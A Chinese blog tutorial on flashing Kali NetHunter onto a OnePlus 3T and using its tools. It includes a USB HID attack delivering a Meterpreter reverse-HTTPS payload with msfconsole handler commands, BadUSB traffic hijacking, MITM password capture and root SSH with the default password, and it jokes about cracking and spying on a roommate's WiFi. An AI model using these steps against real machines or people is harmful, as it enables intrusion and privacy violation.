最近在折腾Nethunter手机,发现刷机过程有点坑,于是想写篇文章记录一下,也好下次少走弯路!

  其实只要找对了正确的刷机包和刷机步骤,30分钟就可以打造一台B格满满的"黑手"。Nethunter下载地址请点这里(需要梯子才能下载),也可以点击这里(密码:v4wq)下载我所使用的所有工具和ROM包。废话不多说,刷机前的准备材料:

  • 一台一加3T手机
  • 一加3T工具箱,SuperSUroot包
  • CM、氢或者氧的底包
  • Nethunter刷机包和Nethunter内核

一. Root手机并刷入第三方Recovery

  打开一加3T工具箱,连接手机,根据提示选择12,工具箱会自动帮你刷入TWRP并root设备

二. 刷入系统底包

  关机后,同时按住电源键和音量下键进入TWRP模式,用数据线连接手机,根据个人选择将氢、氧或者CM底包放入手机TWRP目录,刷入底包和对应的root包(刷入前记得4清)。
注意: 开机后,进入设置-->关于手机-->连续点击7下版本号打开开发者模式,进入开发者模式打开USB调试和OEM锁。

三. 刷入Nethunter包和Nethunter内核

  关机,进入TWRP模式,复制文件到手机TWRP目录,点击install添加Nethuter包和内核包,注意顺序。刷入后开机,就可以看见炫酷的开机画面。进入手机界面后,点击Nethunter图标,给予root权限。

四. 简单的使用文档说明

1.Home
该界面可以得到手机连接WIFI分配的IP地址,点击GET EXTERNAL IP可以得到连接WIFI的外部IP

2.Kali Chroot Manager
检测执行文件时参考的根目录,只有正确的时候才可以执行各种命令(自动安装,不需要更改)

3.Cheak App Update
检测软件的升级(需要梯子)

4.Kali Services
打开和关闭kali系统的各种服务,勾选Start at boot后,该服务会在手机开机的时候自启动,各种服务如下

  • SSH服务:Secure Shell,方便其他设备连接控制
  • Dnsmasq服务:DNS解析服务
  • Hostapd服务:提供无线接入点服务
  • OpenVPN服务:开放OpenVPN连入服务
  • Apache服务:WEB服务
  • Metasploit服务:为MSF攻击模块提供保障
  • Fruity WiFi服务:WiFi审计工具服务
  • BeEF FrameWork服务:XSS利用框架服务

5.Custom Commands
自定义输入命令到kali终端,命令复杂时方便输入用户的输入,可以使用管道符。如一键打开多种服务等...

6.MAC Changer
改变网卡的MAC地址

7.VNC Manager
远程控制软件,可用SSH代替

8.HID Attacks
人机接口设备攻击,下面结合msf回弹shell为例子:

01

  首先,打开Kali Services中的Apache服务,之后转到HID Attacks,设置PowerSploit参数,IP和端口填写MSF监听的IP端口。Payload选择windows/meterpreter/reverse_https,URL为提供Apache服务的IP,这里即是本机:192.168.10.2,写完后,UPDATE。

02

  之后进入kali终端,利用msf生成payload,此时将设备连接至PC机,等待设备被识别后,执行Execute,开始攻击.POWERSHELL命令执行后,就可在msf中看到反弹的shell了

root@kali:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) >
.
.
msf exploit(handler) > set LHOST 192.168.0.2
LHOST => 192.168.10.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

9.DuckHunter HID
模拟大黄鸭,将USB Rubber Ducky脚本转换为NetHunter HID攻击格式,具体用法和上面类似

10.Bad USB MITM Attack
通过USB线接入受害者电脑,执行此攻击可以劫持受害者流量,kali终端会多出一个rndis0的虚拟网卡

此时可以开启Tcpdimp截取流量:Tcpdump –i rndis0

11.Mana Wireless Toolkit
蜜罐,需要配合无线网卡使用

12.MITM Framework
中间人攻击框架,可以抓取目标的明文密码,注入shellcode

五. 相关问题解决

1.刷入nethunter后wifi用不了?
  内核版本有问题,换其他内核

2.进入不了kali的终端?  
  下载并安装手机终端模拟器,进入模拟器输入:su -c bootkali  根据弹窗给予root权限后就可以进入kali终端

3.登陆不了ssh服务?  
  进入终端输入:vi /etc/ssh/sshd_config,找到PermitRootLogin yes这一行,去掉前面的#号,之后利用ssh root@IP登陆即可,密码为toor,前提是打开Nethunter的SSH服务

4.识别不了外置网卡?
  Nethunter里的很多工具都需要外接网卡,根据官方文档,以下网卡型号可以使用:

  • TP-Link TL-WN722N
  • TP-Link TL-WN822N v1 - v3
  • Alfa Networks AWUS036NEH
  • Alfa Networks AWUS036NHA
  • Alfa Networks AWUS036NH
  • Panda PAU05 Nano

5.详细的使用方法?
  其实NT就是手机版的Kali,kali里面能使用的工具,NT基本都能使用!如果将Nethunter做为渗透机器,需要为其配置大的供电设备,还需要为其配置无线网卡,有点鸡肋。不过娱乐娱乐,破解WIFI,中间人嗅探,断下室友wifi,看看室友的浏览记录和图片还是可以的,不说了晋级赛失败的室友又要来找我麻烦了,哈哈!!

作者: Mari0er
链接: https://mari0er.club/post/nethunter.html
版权: 本博客所有文章除特别声明外,均采用CC BY-NC-SA 4.0 许可协议。转载请注明出处!